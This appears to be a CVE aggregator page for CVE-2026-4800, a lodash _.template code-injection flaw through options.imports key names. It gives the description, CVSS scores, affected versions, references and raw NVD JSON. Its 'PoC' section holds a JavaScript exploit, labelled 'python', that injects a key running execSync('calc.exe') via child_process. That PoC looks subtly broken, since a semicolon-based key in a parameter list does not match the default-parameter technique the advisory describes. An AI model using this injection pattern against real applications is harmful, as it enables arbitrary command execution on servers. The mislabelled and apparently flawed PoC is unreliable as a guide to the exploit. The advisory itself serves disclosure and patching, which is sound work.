CVE-2026-4800

Description

Impact: The fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink. When an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time. Additionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function(). Patches: Users should upgrade to version 4.18.0. Workarounds: Do not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names.

CVSS Details

CVSS Score

8.1

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:lodash:lodash-amd:*:*:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:lodash:lodash-es:*:*:*:*:*:node.js:*:* - VULNERABLE

cpe:2.3:a:lodash:lodash.template:*:*:*:*:*:node.js:*:* - VULNERABLE

Lodash < 4.18.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

const _ = require('lodash');

// PoC for CVE-2026-4800: Code Execution via options.imports
// The key name in imports is not sanitized and flows into Function()

var source = '<%= "test" %>';
var options = {
  imports: {
    // Injecting a default parameter expression to execute arbitrary code
    'a;return global.process.mainModule.require("child_process").execSync("calc.exe");//': 'value'
  }
};

try {
  var compiled = _.template(source, options);
  compiled();
} catch (e) {
  console.log(e);
}

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4800
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4800
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4800/
[4] VulDB https://vuldb.com/cve/CVE-2026-4800
[5] https://cna.openjsf.org/security-advisories.html
[6] https://github.com/advisories/GHSA-35jh-r3h4-6jhm
[7] https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4800", "sourceIdentifier": "ce714d77-add3-4f53-aff5-83d477b104bb", "published": "2026-03-31T20:16:29.660", "lastModified": "2026-05-01T18:09:13.047", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Impact:\n\nThe fix for CVE-2021-23337 (https://github.com/advisories/GHSA-35jh-r3h4-6jhm) added validation for the variable option in _.template but did not apply the same validation to options.imports key names. Both paths flow into the same Function() constructor sink.\n\nWhen an application passes untrusted input as options.imports key names, an attacker can inject default-parameter expressions that execute arbitrary code at template compilation time.\n\nAdditionally, _.template uses assignInWith to merge imports, which enumerates inherited properties via for..in. If Object.prototype has been polluted by any other vector, the polluted keys are copied into the imports object and passed to Function().\n\nPatches:\n\nUsers should upgrade to version 4.18.0.\n\nWorkarounds:\n\nDo not pass untrusted input as key names in options.imports. Only use developer-controlled, static key names."}], "metrics": {"cvssMetricV31": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "ce714d77-add3-4f53-aff5-83d477b104bb", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:lodash:lodash:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.18.0", "matchCriteriaId": "39F0989E-0B80-43AC-8991-A9DD5A80A46F"}, {"vulnerable": true, "criteria": "cpe:2.3:a:lodash:lodash-amd:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.18.0", "matchCriteriaId": "D90D1890-8336-4908-AF2B-6FAFF0C1335A"}, {"vulnerable": true, "criteria": "cpe:2.3:a:lodash:lodash-es:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.18.0", "matchCriteriaId": "8E7D1C16-4398-4ED8-B5DD-9D3B10BA0C22"}, {"vulnerable": true, "criteria": "cpe:2.3:a:lodash:lodash.template:*:*:*:*:*:node.js:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "4.18.0", "matchCriteriaId": "D28F304B-AC93-4CAE-95BD-246998E0B009"}]}]}], "references": [{"url": "https://cna.openjsf.org/security-advisories.html", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Third Party Advisory"]}, {"url": "https://github.com/advisories/GHSA-35jh-r3h4-6jhm", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Not Applicable"]}, {"url": "https://github.com/lodash/lodash/commit/3469357cff396a26c363f8c1b5a91dde28ba4b1c", "source": "ce714d77-add3-4f53-aff5-83d477b104bb", "tags": ["Not Applicable"]}]}}